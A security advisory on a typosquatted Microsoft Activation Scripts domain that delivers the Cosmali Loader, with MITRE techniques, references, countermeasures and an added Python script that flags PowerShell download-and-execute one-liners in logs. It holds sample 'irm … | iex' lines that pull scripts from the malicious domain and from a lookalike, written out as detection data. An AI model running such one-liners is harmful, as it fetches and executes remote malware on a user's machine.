A typosquatted domain mimicking the popular Microsoft Activation Scripts (MAS) tool has emerged as a trap for Windows users seeking unlicensed activation, delivering the PowerShell-based Cosmali Loader malware instead of the legitimate scripts. Attackers registered "get.activate.win", which differs by a single letter from the real "get.activated.win", and rely on users mistyping the domain when they hastily enter the MAS command in PowerShell for activation methods such as HWID or KMS emulation. The campaign came to light when infected users reported alarming pop-up warnings, apparently triggered by a security researcher who accessed the malware's insecurely exposed control panel and used it to notify victims, urging them to check Task Manager for suspicious PowerShell processes and to reinstall Windows.
What sets this attack apart from run-of-the-mill phishing or drive-by downloads is its exploitation of one specific user behavior: the rush to bypass Microsoft's licensing using the open-source MAS scripts hosted on GitHub. Unlike broad malware droppers that rely on email lures or fake updates, this campaign leverages typosquatting in a niche ecosystem where tech-savvy but license-averse users (from home tinkerers to IT admins in testing environments) copy and paste commands without double-checking the domain. The Cosmali Loader itself stands out for its modular payload delivery; it has previously been observed deploying cryptominers and the XWorm remote access trojan (RAT), turning a simple activation mishap into persistent remote control or resource hijacking.
MAS maintainers quickly issued warnings, emphasizing the risk of executing unverified remote code, and recommended testing in a sandbox to avoid such pitfalls. The incident underscores a broader trend in which unofficial activators become malware vectors, but its unusual feature is the researcher's white-hat intervention through the attackers' own sloppy C2 panel, which turned a stealthy infection chain into a public wake-up call.
Severity:
Medium
Attack Surface:
Endpoint OS, Web Application
Tactics:
Command and Control, Defense Evasion, Discovery, Execution, Exfiltration, Initial Access
Techniques:
T1059.001 – Command and Scripting Interpreter: PowerShell (victim runs the fetched script in PowerShell)
T1105 – Ingress Tool Transfer (Cosmali Loader and its follow-on payloads downloaded from the fake domain)
T1071.001 – Application Layer Protocol: Web Protocols (communication with the attackers' control panel)
T1036 – Masquerading (fake Microsoft activation domain)
T1189 – Drive-by Compromise (typosquatted domain serving malicious content to users who fetch the script)
T1027 – Obfuscated Files or Information
Indicator of Compromise:
1. https://otx.alienvault.com/pulse/694ded64252279c20f5650d3
References:
1. https://www.reddit.com/r/antivirus/comments/1psglq4/comment/nv9ol7x/
2. https://x.com/struppigel/status/2003365461862588556
3. https://x.com/RussianPanda9xx/status/2003692375500341675
4. https://www.reddit.com/r/MAS_Activator/comments/1ptcqp1/told_i_have_been_infected_by_a_malware_called/
SuperPRO’s Threat Countermeasures Procedures:
1. Block known fake activation domains at DNS and proxy level
2. Disable or restrict PowerShell v2 via Group Policy, since the legacy engine lacks AMSI and script block logging support
3. Enforce PowerShell Constrained Language Mode on endpoints
4. Enable PowerShell Script Block Logging (Event ID 4104) together with AMSI, and monitor for encoded commands and download-and-execute one-liners such as `irm <url> | iex`
5. Block outbound PowerShell connections to unknown external domains
6. Educate users to avoid third-party Windows activation tools and scripts
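As an added example supporting countermeasures 1 and 4 (this is not code from the original advisory, from the MAS project, or from any vendor), the script below scans PowerShell Script Block Logging text for download-and-execute one-liners such as `irm <url> | iex`, extracts the host, and reports whether it is the known fake domain from this campaign, a close lookalike of a reference host such as get.activated.win (edit distance check), or an unknown host. The log events, user names and the host get-activated.win are constructed for illustration; the edit-distance threshold is an assumption to tune.

```python
# Added detection example for this advisory; it is not code from the original
# page, from the MAS project, or from any vendor. It scans PowerShell Script
# Block Logging text (Event ID 4104 ScriptBlockText) for download-and-execute
# one-liners such as `irm <url> | iex`, extracts the host, and reports hosts
# that are known-bad, lookalikes of a reference host, or unknown.
# The log events below are constructed for illustration.
import re
from urllib.parse import urlparse

# Legitimate hosts that typosquats imitate; used only as lookalike references.
REFERENCE_HOSTS = {"get.activated.win"}
# Fake activation domain named in this advisory.
KNOWN_BAD_HOSTS = {"get.activate.win"}
# Assumed threshold: hosts within this many edits of a reference host are lookalikes.
LOOKALIKE_MAX_EDITS = 2

FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest)"
EXEC = r"(?:iex|invoke-expression)"
# Form 1: `irm <args> | iex`; form 2: `iex (irm <args>)`.
DOWNLOAD_EXEC_RE = re.compile(
    rf"\b{FETCH}\b[^|\n]*\|\s*{EXEC}\b|\b{EXEC}\s*\([^)]*\b{FETCH}\b[^)]*\)",
    re.IGNORECASE,
)
# A URL or bare hostname inside the matched segment; the \b after the TLD
# stops a filename like "x.ps1" from being taken for a host.
URL_RE = re.compile(
    r"(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}\b(?::\d+)?(?:/[^\s'\")|]*)?",
    re.IGNORECASE,
)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, so get.activate.win vs get.activated.win is 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def host_of(url: str) -> str:
    """Hostname of a URL; a scheme-less `irm get.activated.win` is accepted."""
    if "://" not in url:
        url = "https://" + url
    return (urlparse(url).hostname or "").lower()


def classify_host(host: str) -> str:
    if host in KNOWN_BAD_HOSTS:
        return "known-bad"
    if host in REFERENCE_HOSTS:
        return "reference-host"
    for ref in REFERENCE_HOSTS:
        if levenshtein(host, ref) <= LOOKALIKE_MAX_EDITS:
            return f"lookalike-of:{ref}"
    return "unknown"


def scan_events(events):
    """Return one finding per download-and-execute segment found in the events."""
    findings = []
    for ev in events:
        for m in DOWNLOAD_EXEC_RE.finditer(ev["script"]):
            segment = m.group(0)
            url = URL_RE.search(segment)
            host = host_of(url.group(0)) if url else ""
            findings.append({
                "record": ev["record"],
                "user": ev["user"],
                "host": host,
                "verdict": classify_host(host) if host else "no-host-found",
                "segment": segment,
            })
    return findings


# Constructed sample events in the shape of 4104 ScriptBlockText entries.
SAMPLE_EVENTS = [
    {"record": 101, "user": "CORP\\alice", "script": "irm https://get.activated.win | iex"},
    {"record": 102, "user": "CORP\\bob", "script": "irm https://get.activate.win | iex"},
    # get-activated.win is a constructed lookalike, not a domain named in the advisory.
    {"record": 103, "user": "CORP\\carol", "script": "iex (irm 'https://get-activated.win')"},
    {"record": 104, "user": "CORP\\dave", "script": "Get-Process | Where-Object CPU -gt 10"},
    {"record": 105, "user": "CORP\\erin",
     "script": "Invoke-RestMethod https://scripts.example.net/setup.ps1 | Invoke-Expression"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['record']} {f['user']:<12} {f['verdict']:<32} {f['host']}")
```

In production the events would come from the Microsoft-Windows-PowerShell/Operational log rather than an inline list, and the reference-host verdict still deserves review: under countermeasure 6, even a correctly typed activation one-liner is activity the organisation has asked users not to perform.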
Contributed by: Thivya